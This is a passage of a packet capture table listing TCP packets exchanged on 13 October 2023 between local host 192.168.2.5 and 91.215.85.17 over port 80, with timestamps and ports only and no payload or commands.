Oct 13, 2023 15:20:57.236766100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236793995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236833096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236846924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236882925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236916065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.236949921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.236994028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237031937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237061977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237077951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237107038 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237186909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237188101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237238884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237266064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237303019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237381935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237428904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237452030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237489939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237515926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237550974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237581968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237618923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237662077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237696886 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237771034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237807989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237838984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237874031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237935066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237951994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.237972975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.237991095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238006115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238040924 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238081932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238116980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238122940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238157034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238185883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238221884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238253117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238286018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238329887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238367081 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238398075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238436937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238501072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238537073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238579035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238614082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238642931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238678932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238679886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238713026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238718033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238751888 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238795042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238831043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.238954067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.238985062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239005089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239038944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239069939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239104033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239135027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239173889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239182949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239217997 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239248037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239283085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239305973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239322901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239340067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239361048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239402056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239437103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239464998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239499092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239579916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239598036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239617109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239629030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239641905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239675999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239686966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239725113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239814997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239850998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239875078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239909887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239926100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.239962101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.239994049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240029097 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240045071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240078926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240123987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240156889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240247011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240282059 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240324974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240360022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240371943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240407944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240438938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240474939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240519047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240535975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240556002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240571022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240642071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240677118 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240685940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240716934 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240724087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240756035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240777016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240811110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.240935087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.240972042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241007090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241043091 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241056919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241095066 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241127968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241163969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241172075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241203070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241208076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241241932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241286993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241322994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241347075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241384029 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241415977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241451979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241466045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241502047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241535902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241574049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241605997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241643906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241692066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241729975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241818905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241857052 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.241904974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.241945982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242016077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242053986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242088079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242119074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242125988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242165089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242192984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242223024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242230892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242265940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242299080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242337942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242455006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242496014 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242520094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242548943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242558956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242564917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242594004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242615938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242640972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242677927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242711067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242748022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242765903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242805004 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242839098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242868900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242875099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242906094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.242908955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.242947102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243031025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243069887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243115902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243154049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243165016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243202925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243237019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243321896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243338108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243377924 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243391037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243407965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243427992 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243448973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243575096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243613005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243658066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243714094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243781090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243822098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243832111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243870020 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243895054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.243933916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.243990898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244031906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244066954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244110107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244138002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244178057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244196892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244239092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244271994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244323015 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244328976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244365931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244385958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244422913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244426966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244465113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244499922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244539976 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244560957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244597912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244632006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244672060 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244699001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244735956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244899988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.244941950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.244966030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245008945 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245035887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245064974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245076895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245110989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245152950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245193958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245196104 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245233059 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245260000 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245297909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245331049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245373011 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245384932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245400906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245418072 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245436907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245476007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245516062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245582104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245620012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245635033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245673895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245753050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245786905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245790005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245824099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245884895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245901108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.245925903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245949030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.245974064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246011019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246058941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246102095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246170998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246210098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246258020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246300936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246326923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246344090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246368885 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246390104 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246470928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246516943 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246550083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246591091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246592045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246623039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246632099 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246668100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246700048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246741056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246767044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246812105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246824980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246841908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246862888 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246884108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246922016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.246963978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.246995926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247034073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247046947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247083902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247132063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247172117 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247205019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247243881 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247245073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247281075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247327089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247370005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247416019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247456074 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247488976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247526884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247545958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247584105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247617006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247657061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247690916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247736931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247771025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247812033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247823954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247863054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247899055 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.247939110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.247987032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248025894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248083115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248122931 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248172045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248209953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248219013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248260975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:57.248294115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:57.248332024 CEST	49721	80	192.168.2.5	91.215.85.17
